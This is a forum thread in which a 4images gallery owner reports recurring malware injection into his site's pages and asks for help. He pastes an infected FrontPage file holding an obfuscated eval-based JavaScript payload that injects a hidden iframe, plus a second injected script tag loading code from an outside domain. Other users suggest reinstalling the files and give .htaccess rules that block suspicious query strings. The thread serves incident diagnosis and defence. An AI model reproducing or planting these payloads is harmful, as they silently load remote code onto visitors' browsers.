Malware infection

[marcinos]

Hello

I have a problem, my gallery from time to time malware attack.
page_footer.php files, page_header.php, index.php, login.php, and the template index.html header.html, footer.html add the code.

Osttanio contributed by forwarding to:

Page rolyjyl.ru has been reported as a party at risk, and was blocked by security settings.

www.fotografie.malopolska.pl

also added a file

Code: [Select]



<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<title> Web Posting Information </title>
</head>

<body><!--d93065-->                                                                                                                                                                                                        <script>i=0;try{avasv=prototype;}catch(z){h="harCode";f=['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f55f76f69f68f58f69f76f4f72f75f5f57f69f75f68f74f8f15f4f70f62f70f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f55f76f69f68f58f69f76f4f72f75f5f57f69f75f68f74f8f15f4f70f62f70f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];}r=String;z=((e)?h:"");for(;567!=i;i+=1){j=i;if(e)s=s+r["fromC"+((e)?z:12)](w[j]*1+42);}if(v&&e&&r&&z&&h&&s&&f&&v)e(s);</script><!--/d93065-->

<!-- postinfo.html version 0.100>
<!--
This file allows users to post files to their web with the Web Publishing Wizard or FrontPad, using the same username and password they would
use if they were authoring with the FrontPage Explorer and Editor.

The values below are automatically set by FrontPage at installation
time.  Normally, you do not need to modify these values, but in case
you do, the parameters are as follows:

'BaseURL' is the URL for your web server.

'DefaultPage' is the name of the default (home) page name
for your web.

'XferType' specifies that the FrontPage server extensions have been
installed on this web.  This value should not be changed.

'FPShtmlScriptUrl', 'FPAuthorScriptUrl', and 'FPAdminScriptUrl' specify
the relative urls for the scripts that FrontPage uses for remote
authoring.  These values should not be changed.

'version' identifies the version of the format of this file, and
should not be changed.
--><!-- WebPost
    version="0.100"
    BaseUrl="http://marcinz.webd.pl"
    XferType="FrontPage"
    DefaultPage="index.htm"
    FPShtmlScriptUrl="_vti_bin/shtml.exe/_vti_rpc"
    FPAuthorScriptUrl="_vti_bin/_vti_aut/author.exe"
    FPAdminScriptUrl="_vti_bin/_vti_adm/admin.exe"
-->
<p><!--webbot bot="PurpleText"
preview="This page is created in the root directory of your FrontPage web when FrontPage is installed.  It contains information that allows users to edit pages in your web using the Microsoft Web Publishing Wizard or programs which use the Microsoft Web Publishing Wizard such as FrontPad using the same username and password they would use if they were authoring with Microsoft FrontPage. If you do not want to allow users to edit files on this web using tools other than Microsoft FrontPage, you can delete this file."
--></p>

<h1>Web Publishing Information </h1>

<p>The HTML comments in this page contain the configurationinformation
that allows users to edit pages in your web using the Microsoft
Web Publishing Wizard or programs which use the Microsoft Web
Publishing Wizard such as FrontPad using the same username and
password they would use if they were authoring with Microsoft
FrontPage. Please refer to the Microsoft's Internet SDK for more
information on the Web Publishing Wizard APIs. </p>
</body>
</html>




[Nosferatu]

sorry, i don't really know what you want from us

[marcinos]

something again today to have written such code to the page

Code: [Select]

<!--pizda--><script type=text/javascript src=http://mmm2011.ppcsoft.in/validate.js?ftpid=3329></script><!--/pizda-->
and Avast! detect infection

where is the flaw that infects my page

[yousaf]

Seems like no one here can guess from the errors you show that what actually is doing this to your site, so you will have to sort out this issue your self. And since I am not a PHP expert So i can only give you one simple advise that you should replace all php extension files of your 4images site with new ones (and this applies if you are not using a highly modified 4images script on your site) if YES then just keep the "Data" & "Templates" folders only and reinstall 4images script of the same version on your server. if the same thing happens then there will be 2 other reasons either your template files are also infected or there is another script on your server which allows people/spammers to modify every php file on your server.

[sathishIPL]

Seems like no one here can guess from the errors you show that what actually is doing this to your site, so you will have to sort out this issue your self. And since I am not a PHP expert So i can only give you one simple advise that you should replace all php extension files of your 4images site with new ones (and this applies if you are not using a highly modified 4images script on your site) if YES then just keep the "Data" & "Templates" folders only and reinstall 4images script of the same version on your server. if the same thing happens then there will be 2 other reasons either your template files are also infected or there is another script on your server which allows people/spammers to modify every php file on your server.

Follow the above steps as yousaf said ... Once you clean your code .

Add the below code into .htaccess  .It will prevent the attack to some extent

It may help you ...


# proc/self/environ? no way!
RewriteCond %{QUERY_STRING} proc/self/environ [OR]
  
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
  
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*(.*) [OR]
  
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR]
  
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|[|\%[0-9A-Z]{0,2}) [OR]
  
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|[|\%[0-9A-Z]{0,2})
  
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]

[marcinos]

and on issues like the code cleaned, and there is still the same

http://imageshack.us/photo/my-images/696/malwaree.jpg